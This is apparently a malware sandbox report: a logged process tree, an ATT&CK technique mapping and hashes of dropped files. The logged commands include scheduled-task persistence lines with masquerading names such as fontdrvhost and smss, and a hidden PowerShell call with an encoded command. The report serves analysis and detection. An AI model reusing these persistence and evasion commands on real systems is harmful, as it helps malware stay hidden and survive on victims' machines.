C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
1⤵
PID:7764
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
  2⤵
  PID:5340
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
    3⤵
    - Creates scheduled task(s)
    PID:7260

C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
1⤵
PID:7688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 6408 -ip 6408
1⤵
PID:8100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6408 -ip 6408
1⤵
PID:6224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1688 -ip 1688
1⤵
PID:3328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7968 -ip 7968
1⤵
PID:3152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2748 -ip 2748
1⤵
PID:2656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4116 -ip 4116
1⤵
PID:7124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2716 -ip 2716
1⤵
PID:6152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Desktop\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
PID:7840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default\Desktop\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 7968 -ip 7968
1⤵
PID:7592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Desktop\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7632

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2748 -ip 2748
1⤵
PID:6664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1688 -ip 1688
1⤵
PID:4188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1688 -ip 1688
1⤵
PID:2752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 7968 -ip 7968
1⤵
PID:5204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 928 -ip 928
1⤵
PID:6256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hiuhehufwh" /sc MINUTE /mo 8 /tr "'C:\DriverHostCrtNet\hiuhehufw.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3472 -ip 3472
1⤵
PID:4328

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
1⤵
PID:1984

C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\it\backgroundTaskHost.exe
"C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\it\backgroundTaskHost.exe"
1⤵
PID:4848

C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
1⤵
PID:7648

C:\Users\Public\Libraries\MoUsoCoreWorker.exe
C:\Users\Public\Libraries\MoUsoCoreWorker.exe
1⤵
PID:4232

C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
1⤵
PID:3356
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
  2⤵
  PID:7452
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
    3⤵
    - Creates scheduled task(s)
    PID:1108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hiuhehufw" /sc ONLOGON /tr "'C:\DriverHostCrtNet\hiuhehufw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3472 -ip 3472
1⤵
PID:7804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1688 -ip 1688
1⤵
PID:7356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7968 -ip 7968
1⤵
PID:7492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hiuhehufwh" /sc MINUTE /mo 7 /tr "'C:\DriverHostCrtNet\hiuhehufw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\ssh\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2472 -ip 2472
1⤵
PID:7864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1688 -ip 1688
1⤵
PID:7172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 7968 -ip 7968
1⤵
PID:7380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\All Users\ssh\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6424

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:7756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5348 -ip 5348
1⤵
PID:4064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1688 -ip 1688
1⤵
PID:8028

C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\6d0c8b5168b34098af171560341fd9a6 /t 5592 /p 224
1⤵
PID:1112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\ssh\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7220

C:\DriverHostCrtNet\WaaSMedicAgent.exe
C:\DriverHostCrtNet\WaaSMedicAgent.exe
1⤵
PID:4188

C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
1⤵
PID:2572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5348 -ip 5348
1⤵
PID:6420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1688 -ip 1688
1⤵
PID:2920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 7968 -ip 7968
1⤵
PID:7884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3208 -ip 3208
1⤵
PID:3248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 1688 -ip 1688
1⤵
PID:2656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5348 -ip 5348
1⤵
PID:3240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 5536 -ip 5536
1⤵
PID:7228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 7968 -ip 7968
1⤵
PID:1732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 2748 -ip 2748
1⤵
PID:7712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 3188 -ip 3188
1⤵
PID:7124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4596 -ip 4596
1⤵
PID:3236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 3208 -ip 3208
1⤵
PID:3152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 7968 -ip 7968
1⤵
PID:3968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\DriverHostCrtNet\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
PID:7832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 7860 -ip 7860
1⤵
PID:6328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\DriverHostCrtNet\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5640

C:\Program Files (x86)\Windows Mail\Idle.exe
"C:\Program Files (x86)\Windows Mail\Idle.exe"
1⤵
PID:3236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 2748 -ip 2748
1⤵
PID:7632

C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
1⤵
PID:1320

C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
1⤵
PID:1668
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
  2⤵
  PID:7640
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
    3⤵
    PID:7036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3208 -ip 3208
1⤵
PID:7532

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:6080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\DriverHostCrtNet\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 6156 -ip 6156
1⤵
PID:6456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5348 -ip 5348
1⤵
PID:6528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Mail\RegAsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 2748 -ip 2748
1⤵
PID:7464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsm" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\RegAsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 6328 -ip 6328
1⤵
PID:5504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\RegAsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 6156 -ip 6156
1⤵
PID:3292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 6328 -ip 6328
1⤵
PID:4108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 5348 -ip 5348
1⤵
PID:228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3208 -ip 3208
1⤵
PID:6340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 1688 -ip 1688
1⤵
PID:5300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 6156 -ip 6156
1⤵
PID:968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6328 -ip 6328
1⤵
PID:4216

C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe
"C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe"
1⤵
PID:1452

C:\ProgramData\AdobeReader\GeforceUpdater.exe
C:\ProgramData\AdobeReader\GeforceUpdater.exe
1⤵
PID:1988

C:\Program Files\Windows NT\TableTextService\en-US\Registry.exe
"C:\Program Files\Windows NT\TableTextService\en-US\Registry.exe"
1⤵
PID:6272

C:\Users\Admin\AppData\Roaming\jarhhgw
C:\Users\Admin\AppData\Roaming\jarhhgw
1⤵
PID:4460
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 304
  2⤵
  PID:8696

C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
1⤵
PID:7488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 4088 -ip 4088
1⤵
PID:5304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2472 -ip 2472
1⤵
PID:7036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 3208 -ip 3208
1⤵
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 2748 -ip 2748
1⤵
PID:1184

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 2472 -ip 2472
1⤵
PID:4408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BLduscfibjB" /sc MINUTE /mo 7 /tr "'C:\Windows\Globalization\ELS\BLduscfibj.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5348 -ip 5348
1⤵
PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 2748 -ip 2748
1⤵
PID:7960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 4460 -ip 4460
1⤵
PID:8324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BLduscfibj" /sc ONLOGON /tr "'C:\Windows\Globalization\ELS\BLduscfibj.exe'" /rl HIGHEST /f
1⤵
PID:8232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 6328 -ip 6328
1⤵
PID:6100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 6156 -ip 6156
1⤵
PID:8360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 1716 -ip 1716
1⤵
PID:8472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3208 -ip 3208
1⤵
PID:8460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1688 -ip 1688
1⤵
PID:8452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BLduscfibjB" /sc MINUTE /mo 8 /tr "'C:\Windows\Globalization\ELS\BLduscfibj.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:8632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 6328 -ip 6328
1⤵
PID:8704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2096 -ip 2096
1⤵
PID:8688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "gpupdateg" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\gpupdate.exe'" /f
1⤵
PID:9192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 2748 -ip 2748
1⤵
PID:8992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 5348 -ip 5348
1⤵
PID:8984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 2472 -ip 2472
1⤵
PID:8968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 7936 -ip 7936
1⤵
PID:1244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 6156 -ip 6156
1⤵
PID:3204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 7936 -ip 7936
1⤵
PID:8336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 7968 -ip 7968
1⤵
PID:8644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 6328 -ip 6328
1⤵
PID:4196

C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
1⤵
PID:9116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1688 -ip 1688
1⤵
PID:4028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6156 -ip 6156
1⤵
PID:8964

C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
1⤵
PID:8488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "gpupdate" /sc ONLOGON /tr "'C:\Users\All Users\gpupdate.exe'" /rl HIGHEST /f
1⤵
PID:8452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "gpupdateg" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\gpupdate.exe'" /rl HIGHEST /f
1⤵
PID:6528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6328 -ip 6328
1⤵
PID:3692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "VjIybGLsw0ZZ98UehZs48p33V" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\VjIybGLsw0ZZ98UehZs48p33.exe'" /f
1⤵
PID:3580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "VjIybGLsw0ZZ98UehZs48p33" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\VjIybGLsw0ZZ98UehZs48p33.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:7548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 6328 -ip 6328
1⤵
PID:7412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6156 -ip 6156
1⤵
PID:7420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "VjIybGLsw0ZZ98UehZs48p33V" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\VjIybGLsw0ZZ98UehZs48p33.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:7184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 3208 -ip 3208
1⤵
PID:5284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\odt\smss.exe'" /f
1⤵
- Creates scheduled task(s)
PID:1152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 1688 -ip 1688
1⤵
PID:8496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6156 -ip 6156
1⤵
PID:9116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 7968 -ip 7968
1⤵
PID:8384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5348 -ip 5348
1⤵
PID:8636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\odt\smss.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:7176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Scripting

T1064

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\DriverHostCrtNet\ELvGRxvU.bat

Filesize
32B

MD5
39e72d40a9ddaaf86994f941af3f7465

SHA1
e4b7c6d895cb2ce60391ab1a4363425868b63204

SHA256
4482b48de5d1a8c39b59f5293ddc7bbcba2af31ff77ebc02e48b68c6a68b0fae

SHA512
beb0761aaca17016bd7def46956b006f201885f24b1ecce29e75b65199f9196a3cb2461b79734e49f8a2328647f3ae2e741b8afb52d7857d429b0a7b0ef0f4a1

Download Submit
C:\DriverHostCrtNet\comSvc.exe

Filesize
18KB

MD5
c8e8cb38838590f47ceb5a5c2129fec9

SHA1
7cc6ac037451376d3f06bea4bb796a787b540565

SHA256
af9a6f8753a6bae7c78364f5a5cb67ddb3b2b440294c8cf0866a4d13acd86b6d

SHA512
ea72fd419893123fd8961f013af195fc170102929b785c801180d5d3db0cb031fff469229962dd8df5dfdeed7bf275ad4dadd42d8e92f90b24112c509d773f45

Download Submit
C:\DriverHostCrtNet\comSvc.exe

Filesize
17KB

MD5
129c072a7068c21d7423a893b785e915

SHA1
00bf3f786da276524e7031532d36113313850b9e

SHA256
f1a72efa56b92c3f1d07a6b7f65a00378af4c207fdea088e2f69309e62c25f5c

SHA512
572f92ed5e15a3d4a8fa81c8b865aa9246519de21fe6fdaacf571d7067dc11486530e2e2afac32e9171685f3de0abdfcb4d2baeb3e6922f66340e050f1e540cd

Download Submit
C:\DriverHostCrtNet\jO3lbUgUCuGG0nAZHcS.vbe

Filesize
201B

MD5
82adae7375b04faa5979ee4a8ec018fe

SHA1
03399a4be44e3506e924019af67fbc4d5d52368b

SHA256
3a1dc9b632500be6a83a3ce53de4e6e5e09f2ea48ab7a7d79f51b68ec2278f44

SHA512
56b4c020d393ca69369fc538affb0787a19831e0536a6c61080c4c2e05c12624fb0bed5456676daaa09591c163ce6cd229f1e723c53965c2212912d442464c4a

Download Submit
C:\Program Files\Windows NT\TableTextService\en-US\RCXE10E.tmp

Filesize
81KB

MD5
5956ba958fad3eb0eba7a18c52f6eaed

SHA1
38a75f09490159299ddeeaef89e2d3fd1c0c46e9

SHA256
d20671718c089e48bb7145b2eda6119f93b3e035d4d6a79d06fd76d3ac68a06a

SHA512
0066fb18d6ee2ee62b1a47d1a2a36c73ea420c7028056a9e05ef5c6b51dd872a03694a0d300b09316c09ee57e514f6134de9999b1fc2422487ff7d54d45f2949

Download Submit
C:\Program Files\Windows NT\TableTextService\en-US\Registry.exe

Filesize
242KB

MD5
52b1705559d677b8ad24e06ae771eb5c

SHA1
